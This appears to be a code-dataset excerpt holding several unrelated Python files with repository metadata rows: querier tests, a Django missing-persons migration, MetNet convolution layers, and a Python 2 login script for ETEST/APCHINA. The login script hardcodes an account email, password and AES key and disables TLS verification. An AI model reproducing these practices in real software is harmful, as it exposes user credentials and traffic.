return result | 32.627737 | 85 | 0.50783 | 548 | 4,470 | 4.076642 | 0.14781 | 0.026858 | 0.050134 | 0.022381 | 0.813339 | 0.813339 | 0.813339 | 0.803939 | 0.789615 | 0.758729 | 0 | 0.050034 | 0.342729 | 4,470 | 137 | 86 | 32.627737 | 0.710347 | 0.125503 | 0 | 0.709677 | 0 | 0 | 0.008494 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.064516 | false | 0 | 0.021505 | 0 | 0.150538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7ece2d51c125ae2b775ca0483d7ec3c08083ffae | 3,735 | py | Python | tests/test_source.py | xjiro/python-valve | d092690ffda9999ded3aa6739d26feaefbabb996 | [
"MIT"
] | 136 | 2017-09-21T13:12:05.000Z | 2022-03-17T21:02:01.000Z | tests/test_source.py | fizek/python-valve | 963086a385b771a9d58a757814a5cea8111c1c8b | [
"MIT"
] | 47 | 2017-09-17T11:03:03.000Z | 2022-02-26T15:26:51.000Z | tests/test_source.py | fizek/python-valve | 963086a385b771a9d58a757814a5cea8111c1c8b | [
"MIT"
] | 62 | 2017-10-01T20:13:03.000Z | 2022-02-09T21:44:18.000Z | # -*- coding: utf-8 -*-
# Copyright (C) 2017 Oliver Ainsworth
from __future__ import (absolute_import,
unicode_literals, print_function, division)
import socket
import pytest
import valve.source
class TestBaseQuerier:
def test(self):
querier = valve.source.BaseQuerier(('192.0.2.0', 27015))
assert querier.host == '192.0.2.0'
assert querier.port == 27015
assert querier._socket.family == socket.AF_INET
assert querier._socket.type == socket.SOCK_DGRAM
querier.close()
assert querier._socket is None
def test_close(self):
querier = valve.source.BaseQuerier(('192.0.2.0', 27015))
assert querier._socket.family == socket.AF_INET
assert querier._socket.type == socket.SOCK_DGRAM
querier.close()
assert querier._socket is None
with pytest.raises(valve.source.QuerierClosedError):
querier.request()
with pytest.raises(valve.source.QuerierClosedError):
querier.get_response()
def test_close_redundant(self):
querier = valve.source.BaseQuerier(('192.0.2.0', 27015))
assert querier._socket.family == socket.AF_INET
assert querier._socket.type == socket.SOCK_DGRAM
querier.close()
assert querier._socket is None
with pytest.raises(valve.source.QuerierClosedError):
querier.request()
with pytest.raises(valve.source.QuerierClosedError):
querier.get_response()
querier.close()
assert querier._socket is None
with pytest.raises(valve.source.QuerierClosedError):
querier.request()
with pytest.raises(valve.source.QuerierClosedError):
querier.get_response()
def test_context_manager(self):
with valve.source.BaseQuerier(('192.0.2.0', 27015)) as querier:
assert querier._socket.family == socket.AF_INET
assert querier._socket.type == socket.SOCK_DGRAM
assert querier._socket is None
with pytest.raises(valve.source.QuerierClosedError):
querier.request()
with pytest.raises(valve.source.QuerierClosedError):
querier.get_response()
def test_context_manager_close_before_exit(self):
with valve.source.BaseQuerier(('192.0.2.0', 27015)) as querier:
assert querier._socket.family == socket.AF_INET
assert querier._socket.type == socket.SOCK_DGRAM
with pytest.warns(UserWarning):
querier.close()
assert querier._socket is None
with pytest.raises(valve.source.QuerierClosedError):
querier.request()
with pytest.raises(valve.source.QuerierClosedError):
querier.get_response()
assert querier._socket is None
with pytest.raises(valve.source.QuerierClosedError):
querier.request()
with pytest.raises(valve.source.QuerierClosedError):
querier.get_response()
def test_context_manager_close_after_exit(self):
with valve.source.BaseQuerier(('192.0.2.0', 27015)) as querier:
assert querier._socket.family == socket.AF_INET
assert querier._socket.type == socket.SOCK_DGRAM
assert querier._socket is None
with pytest.raises(valve.source.QuerierClosedError):
querier.request()
with pytest.raises(valve.source.QuerierClosedError):
querier.get_response()
querier.close()
assert querier._socket is None
with pytest.raises(valve.source.QuerierClosedError):
querier.request()
with pytest.raises(valve.source.QuerierClosedError):
querier.get_response()
| 39.315789 | 71 | 0.652477 | 412 | 3,735 | 5.762136 | 0.143204 | 0.106571 | 0.168071 | 0.141533 | 0.889217 | 0.889217 | 0.889217 | 0.889217 | 0.889217 | 0.889217 | 0 | 0.029307 | 0.25087 | 3,735 | 94 | 72 | 39.734043 | 0.819157 | 0.015261 | 0 | 0.8125 | 0 | 0 | 0.017143 | 0 | 0 | 0 | 0 | 0 | 0.2875 | 1 | 0.075 | false | 0 | 0.05 | 0 | 0.1375 | 0.0125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7d43866b3923b809cc6597da947c5cf3c633e5b0 | 13,072 | py | Python | blog/migrations/0001_initial.py | Chutithep88/findingpersonsystem | 9385c60bb59b37c42a18c976be9984b94840b2be | [
"bzip2-1.0.6"
] | null | null | null | blog/migrations/0001_initial.py | Chutithep88/findingpersonsystem | 9385c60bb59b37c42a18c976be9984b94840b2be | [
"bzip2-1.0.6"
] | 9 | 2021-03-19T02:38:15.000Z | 2022-01-13T02:38:15.000Z | blog/migrations/0001_initial.py | Chutithep88/findingpersonsystem | 9385c60bb59b37c42a18c976be9984b94840b2be | [
"bzip2-1.0.6"
] | null | null | null | # Generated by Django 2.1 on 2020-04-02 16:32
import cloudinary.models
from django.conf import settings
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='AgePeople',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20)),
],
),
migrations.CreateModel(
name='allemail',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('position', models.CharField(default='', max_length=200)),
('mail', models.CharField(default='', max_length=200)),
('organization', models.CharField(default='', max_length=200)),
('places', models.CharField(default='', max_length=200)),
],
),
migrations.CreateModel(
name='Gender',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20)),
],
),
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('realname', models.CharField(default='', max_length=150, verbose_name="<font color='red'>ชื่อจริงและนามสกุล</font>")),
('nickname', models.CharField(default='', max_length=50, verbose_name="<font color='red'>ชื่อเล่น</font>")),
('realnameEng', models.CharField(blank=True, max_length=150, null=True, verbose_name='ชื่ออังกฤษ')),
('age', models.PositiveIntegerField(blank=True, help_text='กรอกอายุ 1- 100 (จำเป็นต้องกรอก)', null=True, validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(100)], verbose_name="<font color='red'>อายุ(ปี)</font>")),
('nationality', models.CharField(default='', max_length=10, verbose_name="<font color='red'>เชื้อชาติ</font>")),
('lostday', models.CharField(blank=True, help_text='กรอกวันที่ เช่น 21/01/2530', max_length=10, null=True, verbose_name='วันที่หาย')),
('lostTime', models.CharField(blank=True, help_text='กรอกเวลา เช่น 12.00 , 19.30', max_length=5, null=True, verbose_name='เวลาที่หาย')),
('lostWhere', models.CharField(blank=True, max_length=100, null=True, verbose_name='สถานที่หาย')),
('lostReason', models.CharField(blank=True, max_length=200, null=True, verbose_name='เหตุผลที่หาย')),
('identities', models.CharField(default='', help_text='ลักษณะพิเศษ เช่น มีไฝบนหน้า ใส่สร้องทอง ผิวคล้ำเป็นต้น', max_length=100, verbose_name="<font color='red'>ลักษณะพิเศษ</font>")),
('image', cloudinary.models.CloudinaryField(blank=True, max_length=255, null=True, verbose_name='รูปภาพ')),
('content', models.TextField(blank=True, help_text='กรอกรายละเอียดเพิ่มเติม', null=True, verbose_name='รายละเอียดเพิ่มเติม')),
('date_posted', models.DateTimeField(default=django.utils.timezone.now)),
('gender', models.CharField(default='', max_length=5, verbose_name="<font color='red'>เพศ</font>")),
('telephone', models.CharField(default='', max_length=10, verbose_name="<font color='red'>เบอร์โทรติดต่อกับผู้บันทึกข้อมูล</font>")),
('email', models.CharField(default='', max_length=100, verbose_name="<font color='red'>อีเมล์ของผู้บันทึกข้อมูล</font>")),
('author', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Postfound',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('realname', models.CharField(default='', max_length=150, verbose_name="<font color='red'>ชื่อจริงและนามสกุล</font>")),
('nickname', models.CharField(default='', max_length=50, verbose_name="<font color='red'>ชื่อเล่น</font>")),
('realnameEng', models.CharField(blank=True, max_length=150, null=True, verbose_name='ชื่ออังกฤษ')),
('age', models.PositiveIntegerField(blank=True, help_text='กรอกอายุ 1- 100', null=True, validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(100)], verbose_name="<font color='red'>อายุ(ปี)</font>")),
('nationality', models.CharField(default='', max_length=10, verbose_name="<font color='red'>เชื้อชาติ</font>")),
('lostday', models.CharField(blank=True, help_text='กรอกวันที่ เช่น 21/01/2530', max_length=10, null=True, verbose_name='วันที่หาย')),
('lostTime', models.CharField(blank=True, help_text='กรอกเวลา เช่น 12.00 , 19.30', max_length=5, null=True, verbose_name='เวลาที่หาย')),
('lostWhere', models.CharField(blank=True, max_length=100, null=True, verbose_name='สถานที่หาย')),
('lostReason', models.CharField(blank=True, max_length=200, null=True, verbose_name='เหตุผลที่หาย')),
('identities', models.CharField(default='', help_text='ลักษณะพิเศษ เช่น มีไฝบนหน้า ใส่สร้องทอง ผิวคล้ำเป็นต้น', max_length=100, verbose_name="<font color='red'>ลักษณะพิเศษ</font>")),
('image', cloudinary.models.CloudinaryField(blank=True, max_length=255, null=True, verbose_name='รูปภาพ')),
('content', models.TextField(blank=True, help_text='กรอกรายละเอียดเพิ่มเติม', null=True, verbose_name='รายละเอียดเพิ่มเติม')),
('date_posted', models.DateTimeField(default=django.utils.timezone.now)),
('gender', models.CharField(default='', max_length=5, verbose_name="<font color='red'>เพศ</font>")),
('telephone', models.CharField(default='', max_length=10, verbose_name="<font color='red'>เบอร์โทรติดต่อกับผู้บันทึกข้อมูล</font>")),
('email', models.CharField(default='', max_length=100, verbose_name="<font color='red'>อีเมล์ของผู้บันทึกข้อมูล</font>")),
('author', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='PostFree',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(default='', help_text='กรอกข้อมูลเช่น พบเจอเด็กหลง , พบเจอคนแก่อยู่ที่ถนน... เป็นต้น', max_length=100, verbose_name="<font color='red'>หัวข้อ</font>")),
('image', cloudinary.models.CloudinaryField(blank=True, max_length=255, null=True, verbose_name='รูปภาพ (สำหรับใส่รูปภาพแกติทั่วไป เช่น รูปเด็กหลงทาง รูปคนแก่หาย เป็นต้น)')),
('image2', cloudinary.models.CloudinaryField(blank=True, max_length=255, null=True, verbose_name='รูปภาพ2 (สำหรับใส่รูปภาพที่รุนแรง ไม่ต้องการเผยรูปนี้ในหน้าโชว์ข้อมูล เช่น รูปเสียชีวิตเป็นต้น)')),
('where', models.CharField(default='', help_text='กรอกข้อมูลเช่น พบเจอที่ราชดำเนิน เป็นต้น', max_length=100, verbose_name="<font color='red'>สถานที่พบเจอ</font>")),
('content', models.TextField(blank=True, help_text='กรุณากรอกข้อความให้ครบถ้วนเพื่อสิทธิประโยชน์ของท่านและสำหรับผู้แจ้งเบาะแส', null=True, verbose_name='รายละเอียดเพิ่มเติม')),
('identities', models.CharField(default='', help_text='ลักษณะพิเศษ เช่น มีไฝบนหน้า ใส่สร้องทอง ผิวคล้ำเป็นต้น', max_length=100, verbose_name="<font color='red'>ลักษณะพิเศษ</font>")),
('email', models.CharField(blank=True, help_text='ส่วนของข่อมูลส่วนบุคคล กรอกอีเมล์สำหรับให้ญาติของผู้สูญหายสามารถติดต่อกลับได้', max_length=100, null=True, verbose_name='อีเมล์')),
('telephone', models.PositiveIntegerField(blank=True, help_text='ส่วนของข่อมูลส่วนบุคคล กรอกเบอร์โทรศัพท์สำหรับให้ญาติของผู้สูญหายสามารถติดต่อกลับได้', null=True, verbose_name='เบอร์โทรศัพท์ เช่น 0991234567')),
('date_posted', models.DateTimeField(default=django.utils.timezone.now)),
('age', models.ManyToManyField(to='blog.AgePeople', verbose_name="<font color='red'>อายุ</font>")),
('gender', models.ManyToManyField(to='blog.Gender', verbose_name="<font color='red'>เพศ</font>")),
],
),
migrations.CreateModel(
name='Postmail',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('realname', models.CharField(default='', max_length=150, verbose_name="<font color='red'>ชื่อจริงและนามสกุล</font>")),
('nickname', models.CharField(default='', max_length=50, verbose_name="<font color='red'>ชื่อเล่น</font>")),
('realnameEng', models.CharField(blank=True, max_length=150, null=True, verbose_name='ชื่ออังกฤษ')),
('age', models.PositiveIntegerField(blank=True, help_text='กรอกอายุ 1- 100', null=True, validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(100)], verbose_name="<font color='red'>อายุ(ปี)</font>")),
('nationality', models.CharField(default='', max_length=10, verbose_name="<font color='red'>เชื้อชาติ</font>")),
('lostday', models.CharField(blank=True, help_text='กรอกวันที่ เช่น 21/01/2530', max_length=10, null=True, verbose_name='วันที่หาย')),
('lostTime', models.CharField(blank=True, help_text='กรอกเวลา เช่น 12.00 , 19.30', max_length=5, null=True, verbose_name='เวลาที่หาย')),
('lostWhere', models.CharField(blank=True, max_length=100, null=True, verbose_name='สถานที่หาย')),
('lostReason', models.CharField(blank=True, max_length=200, null=True, verbose_name='เหตุผลที่หาย')),
('identities', models.CharField(default='', help_text='ลักษณะพิเศษ เช่น มีไฝบนหน้า ใส่สร้องทอง ผิวคล้ำเป็นต้น', max_length=100, verbose_name="<font color='red'>ลักษณะพิเศษ</font>")),
('image', cloudinary.models.CloudinaryField(blank=True, max_length=255, null=True, verbose_name='รูปภาพ')),
('content', models.TextField(blank=True, help_text='กรอกรายละเอียดเพิ่มเติม', null=True, verbose_name='รายละเอียดเพิ่มเติม')),
('date_posted', models.DateTimeField(default=django.utils.timezone.now)),
('fromEmail', models.CharField(default='', max_length=150)),
('gender', models.CharField(default='', max_length=5, verbose_name="<font color='red'>เพศ</font>")),
('author', models.ForeignKey(default='', on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='PostRisk',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('realname', models.CharField(default='', max_length=150, verbose_name="<font color='red'>ชื่อจริงและนามสกุล</font>")),
('nickname', models.CharField(default='', max_length=50, verbose_name="<font color='red'>ชื่อเล่น</font>")),
('realnameEng', models.CharField(blank=True, max_length=150, null=True, verbose_name='ชื่ออังกฤษ')),
('age', models.PositiveIntegerField(blank=True, null=True, validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(100)], verbose_name="<font color='red'>อายุ</font>")),
('nationality', models.CharField(default='', max_length=10, verbose_name="<font color='red'>เชื้อชาติ</font>")),
('identities', models.CharField(default='', help_text='ลักษณะพิเศษ เช่น มีไฝบนหน้า ใส่สร้องทอง ผิวคล้ำเป็นต้น', max_length=100, verbose_name="<font color='red'>ลักษณะพิเศษ</font>")),
('image', cloudinary.models.CloudinaryField(blank=True, max_length=255, null=True, verbose_name='รูปภาพ')),
('content', models.TextField(blank=True, help_text='กรอกรายละเอียดเพิ่มเติม', null=True, verbose_name='รายละเอียดเพิ่มเติม')),
('date_posted', models.DateTimeField(default=django.utils.timezone.now)),
('gender', models.CharField(default='', max_length=5, verbose_name="<font color='red'>เพศ</font>")),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| 88.92517 | 277 | 0.63242 | 1,989 | 13,072 | 4.252891 | 0.128205 | 0.091027 | 0.058518 | 0.078023 | 0.890294 | 0.886039 | 0.861095 | 0.849273 | 0.842771 | 0.835914 | 0 | 0.022834 | 0.182528 | 13,072 | 146 | 278 | 89.534247 | 0.733389 | 0.003289 | 0 | 0.719424 | 1 | 0.107914 | 0.254088 | 0.109926 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.043165 | 0 | 0.071942 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
adf29d0ba5ab99bd6d4eefd4da83b97b532757f6 | 3,528 | py | Python | metnet/layers/DilatedCondConv.py | ValterFallenius/metnet | 7cde48a7b5fc0b69a8ce9083f934949362620fd5 | [
"MIT"
] | null | null | null | metnet/layers/DilatedCondConv.py | ValterFallenius/metnet | 7cde48a7b5fc0b69a8ce9083f934949362620fd5 | [
"MIT"
] | null | null | null | metnet/layers/DilatedCondConv.py | ValterFallenius/metnet | 7cde48a7b5fc0b69a8ce9083f934949362620fd5 | [
"MIT"
] | null | null | null | """Dilated Time Conditioned Residual Convolution Block for MetNet-2"""
import torch
import torch.nn as nn
import torch.nn.functional as F
from metnet.layers.LeadTimeConditioner import LeadTimeConditioner
class DilatedResidualConv(nn.Module):
def __init__(
self,
input_channels: int,
output_channels: int = 384,
dilation: int = 1,
kernel_size: int = 3,
activation: nn.Module = nn.ReLU(),
):
super().__init__()
self.dilated_conv_one = nn.Conv2d(
in_channels=input_channels,
out_channels=output_channels,
dilation=(dilation, dilation),
kernel_size=(kernel_size, kernel_size),
padding="same",
)
# Target Time index conditioning
self.lead_time_conditioner = LeadTimeConditioner()
self.activation = activation
self.dilated_conv_two = nn.Conv2d(
in_channels=output_channels,
out_channels=output_channels,
dilation=(dilation, dilation),
kernel_size=(kernel_size, kernel_size),
padding="same",
)
# To make sure number of channels match, might need a 1x1 conv
if input_channels != output_channels:
self.channel_changer = nn.Conv2d(
in_channels=input_channels, out_channels=output_channels, kernel_size=(1, 1)
)
else:
self.channel_changer = nn.Identity()
def forward(self, x: torch.Tensor, beta, gamma) -> torch.Tensor:
out = self.dilated_conv_one(x)
out = F.layer_norm(out, out.size()[1:])
out = self.lead_time_conditioner(out, beta, gamma)
out = self.activation(out)
out = self.dilated_conv_two(out)
out = F.layer_norm(out, out.size()[1:])
out = self.lead_time_conditioner(out, beta, gamma)
out = self.activation(out)
x = self.channel_changer(x)
return x + out
class UpsampleResidualConv(nn.Module):
def __init__(
self,
input_channels: int,
output_channels: int = 512,
dilation: int = 1,
kernel_size: int = 3,
activation: nn.Module = nn.ReLU(),
):
super().__init__()
self.dilated_conv_one = nn.ConvTranspose2d(
in_channels=input_channels,
out_channels=output_channels,
stride=2,
kernel_size=kernel_size,
)
# Target Time index conditioning
self.lead_time_conditioner = LeadTimeConditioner()
self.activation = activation
self.dilated_conv_two = nn.ConvTranspose2d(
in_channels=output_channels,
out_channels=output_channels,
stride=2,
kernel_size=kernel_size,
)
if input_channels != output_channels:
self.channel_changer = nn.Conv2d(
in_channels=input_channels, out_channels=output_channels, kernel_size=(1, 1)
)
else:
self.channel_changer = nn.Identity()
def forward(self, x: torch.Tensor, beta, gamma) -> torch.Tensor:
out = self.dilated_conv_one(x)
out = F.layer_norm(out, out.size()[1:])
out = self.lead_time_conditioner(out, beta, gamma)
out = self.activation(out)
out = self.dilated_conv_two(out)
out = F.layer_norm(out, out.size()[1:])
out = self.lead_time_conditioner(out, beta, gamma)
out = self.activation(out)
x = self.channel_changer(x)
return x + out
| 34.930693 | 92 | 0.60856 | 406 | 3,528 | 5.041872 | 0.189655 | 0.068393 | 0.107474 | 0.073278 | 0.849047 | 0.849047 | 0.849047 | 0.849047 | 0.826087 | 0.826087 | 0 | 0.01167 | 0.295635 | 3,528 | 100 | 93 | 35.28 | 0.812072 | 0.053288 | 0 | 0.795455 | 0 | 0 | 0.002401 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0 | 0.045455 | 0 | 0.136364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
70e55e153f43029e803fd055aa5c8803d5dc61ac | 6,906 | py | Python | unusable.py | A2ner/ap | 8282250b4df6d20dc4b1278620b9f0fd665d9600 | [
"MIT"
] | null | null | null | unusable.py | A2ner/ap | 8282250b4df6d20dc4b1278620b9f0fd665d9600 | [
"MIT"
] | null | null | null | unusable.py | A2ner/ap | 8282250b4df6d20dc4b1278620b9f0fd665d9600 | [
"MIT"
] | null | null | null | # _*_ coding: utf-8 _*_
import re
import base64
import requests
from PIL import Image
from bs4 import BeautifulSoup
from Crypto.Cipher import AES
headers = {
'Host': 'apchina.net.cn',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded'
}
#密码加密
def passwd_encode(raw_pass):
key = 'As2Ssgk0AMikkiMA'
IV = 'Bt4GtgCAb5k99k5b'
mode = AES.MODE_CBC
pad = 16 - len(raw_pass) % 16
raw_pass = raw_pass + pad * chr(pad)
encryptor = AES.new(key, AES.MODE_CBC, IV)
encrypt_text = encryptor.encrypt(raw_pass)
encrypt_text = base64.b64encode(encrypt_text)
return encrypt_text
# def login():
#
# req_with_session = requests.session()
# login_session = requests.session()
#
# # username = raw_input('请输入您的ETEST ID: ')
# # passwd = raw_input('请输入您的ETEST ID 密码: ')
# username = '1548983578@qq.com'
# passwd = '123456test!'
#
# def get_captcha():
# captcha_url = "https://passport.etest.net.cn/CheckImage/LoadCheckImage"
# image_url = re.findall('[a-zA-z]+://[^\s]*[$jpg]',req_with_session.post(captcha_url, verify=False).content)[0]
# image_data = req_with_session.get(image_url, verify=False)
# if not image_data:
# return False
# f = open('valcode.jpg', 'wb')
# f.write(image_data.content)
# f.close()
# im = Image.open('valcode.jpg')
# im.show()
# captcha = raw_input('本次登录需要输入验证码: ')
# return captcha
#
#
# def ETEST_login():
# request = req_with_session.get('https://passport.etest.net.cn/', verify=False)
# raw_token = re.findall('<input name="__RequestVerificationToken".*/>', request.content)
# token = raw_token[0].replace('<input name="__RequestVerificationToken" type="hidden" value="', '').replace( '" />', "")
# login_url = 'https://passport.etest.net.cn/'
# data = {
# '__RequestVerificationToken': token,
# 'txtUserName': username,
# 'txtPassword': passwd_encode(passwd),
# 'txtCheckImageValue': get_captcha(),
# 'hdnLoginMode': '',
# 'hdnReturnUrl': '',
# 'hdnRedirectUrl': '',
# 'HiddenAccessToken': '',
# 'HiddenPublicKeyExponent': 'As2Ssgk0AMikkiMA',
# 'HiddenPublicKeyModulus': 'Bt4GtgCAb5k99k5b',
# 'HiddenThirdCode': '',
# 'HiddenThirdName': '',
# 'HiddenSafe': ''
# }
# result = req_with_session.post(login_url, data=data, headers=headers, verify=False)
# if '通行证ID' in result.content:
# print('ETEST 登录成功, 准备跳转到APCHINA...')
# else:
# print (result.content)
# result = req_with_session.get( 'https://passport.etest.net.cn/Manage/Jump?returnUrl=http://apchina.net.cn/Home/VerifyPassport/?LoginType=0&redirectUrl=&loginMode=0&safe=1',verify=False)
# soup = BeautifulSoup(result.content, "html.parser")
# global data
# for name in soup.find_all('input'):
# key = name.get('name')
# value = name.get('value')
# data[key] = value
# print data
# return data
#
# def APCHINA_login():
# ETEST_login()
# result = login_session.post('http://apchina.net.cn/Home/VerifyPassport/?LoginType=0', data=data)
# if "允许报名生日" in result.content:
# print('login success!')
# else:
# print result.content
# raw_sid = re.findall('\'[0-9a-zA-Z]{32}\'', result.content)
# sid = raw_sid[0].replace("'", "")
#
#
# APCHINA_login()
#
# login()
req_with_session = requests.session()
login_session = requests.session()
# username = raw_input('请输入您的ETEST ID: ')
# passwd = raw_input('请输入您的ETEST ID 密码: ')
username = '1548983578@qq.com'
passwd = '123456test!'
class login:
def get_captcha(self):
captcha_url = "https://passport.etest.net.cn/CheckImage/LoadCheckImage"
image_url = re.findall('[a-zA-z]+://[^\s]*[$jpg]', req_with_session.post(captcha_url, verify=False).content)[0]
image_data = req_with_session.get(image_url, verify=False)
if not image_data:
return False
f = open('valcode.jpg', 'wb')
f.write(image_data.content)
f.close()
im = Image.open('valcode.jpg')
im.show()
captcha = raw_input('本次登录需要输入验证码: ')
return captcha
def ETEST_login(self):
request = req_with_session.get('https://passport.etest.net.cn/', verify=False)
raw_token = re.findall('<input name="__RequestVerificationToken".*/>', request.content)
token = raw_token[0].replace('<input name="__RequestVerificationToken" type="hidden" value="', '').replace(
'" />', "")
login_url = 'https://passport.etest.net.cn/'
data = {
'__RequestVerificationToken': token,
'txtUserName': username,
'txtPassword': passwd_encode(passwd),
'txtCheckImageValue': login.get_captcha(self),
'hdnLoginMode': '',
'hdnReturnUrl': '',
'hdnRedirectUrl': '',
'HiddenAccessToken': '',
'HiddenPublicKeyExponent': 'As2Ssgk0AMikkiMA',
'HiddenPublicKeyModulus': 'Bt4GtgCAb5k99k5b',
'HiddenThirdCode': '',
'HiddenThirdName': '',
'HiddenSafe': ''
}
result = req_with_session.post(login_url, data=data, headers=headers, verify=False)
if '通行证ID' in result.content:
print('ETEST 登录成功, 准备跳转到APCHINA...')
else:
print (result.content)
result = req_with_session.get(
'https://passport.etest.net.cn/Manage/Jump?returnUrl=http://apchina.net.cn/Home/VerifyPassport/?LoginType=0&redirectUrl=&loginMode=0&safe=1',
verify=False)
soup = BeautifulSoup(result.content, "html.parser")
for name in soup.find_all('input'):
key = name.get('name')
value = name.get('value')
data[key] = value
print data
return data
def APCHINA_login(self):
login.ETEST_login(self)
result = login_session.post('http://apchina.net.cn/Home/VerifyPassport/?LoginType=0', data=data)
if "允许报名生日" in result.content:
print('login success!')
else:
print result.content
raw_sid = re.findall('\'[0-9a-zA-Z]{32}\'', result.content)
sid = raw_sid[0].replace("'", "")
user = login()
user.APCHINA_login()
| 38.581006 | 196 | 0.578193 | 727 | 6,906 | 5.349381 | 0.225585 | 0.016714 | 0.043199 | 0.043199 | 0.818205 | 0.818205 | 0.818205 | 0.818205 | 0.818205 | 0.818205 | 0 | 0.022041 | 0.270779 | 6,906 | 178 | 197 | 38.797753 | 0.750199 | 0.428758 | 0 | 0.022727 | 0 | 0.034091 | 0.297613 | 0.070808 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.125 | 0.068182 | null | null | 0.056818 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
70f8ff90c4056b07c230c0e18f250b0d59a9c69b | 120 | py | Python | tests/test_ignis.py | insertdead/ignis | 40258161092e3c98ed96f6ce121690f5f7dab15b | [
"Apache-2.0"
] | null | null | null | tests/test_ignis.py | insertdead/ignis | 40258161092e3c98ed96f6ce121690f5f7dab15b | [
"Apache-2.0"
] | 1 | 2022-01-30T03:22:38.000Z | 2022-03-18T22:56:35.000Z | tests/test_ignis.py | insertdead/ignis | 40258161092e3c98ed96f6ce121690f5f7dab15b | [
"Apache-2.0"
] | null | null | null | from ignis import __version__
from ignis.entities import common
def test_version():
assert __version__ == "0.1.0"
| 17.142857 | 33 | 0.75 | 17 | 120 | 4.764706 | 0.647059 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03 | 0.166667 | 120 | 6 | 34 | 20 | 0.78 | 0 | 0 | 0 | 0 | 0 | 0.041667 | 0 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.25 | true | 0 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
cb3788eeca5b59dc0a7d704961372fa9b42433c4 | 172 | py | Python | regym/util/__init__.py | KnwSondess/Regym | 825c7dacf955a3e2f6c658c0ecb879a0ca036c1a | [
"MIT"
] | 2 | 2020-09-13T15:53:20.000Z | 2020-12-08T15:57:05.000Z | regym/util/__init__.py | KnwSondess/Regym | 825c7dacf955a3e2f6c658c0ecb879a0ca036c1a | [
"MIT"
] | null | null | null | regym/util/__init__.py | KnwSondess/Regym | 825c7dacf955a3e2f6c658c0ecb879a0ca036c1a | [
"MIT"
] | 1 | 2021-09-20T13:48:30.000Z | 2021-09-20T13:48:30.000Z | from .play_matches import play_single_match, play_multiple_matches
from .play_matches import extract_winner
from .utils import save_traj_with_graph
from .wrappers import *
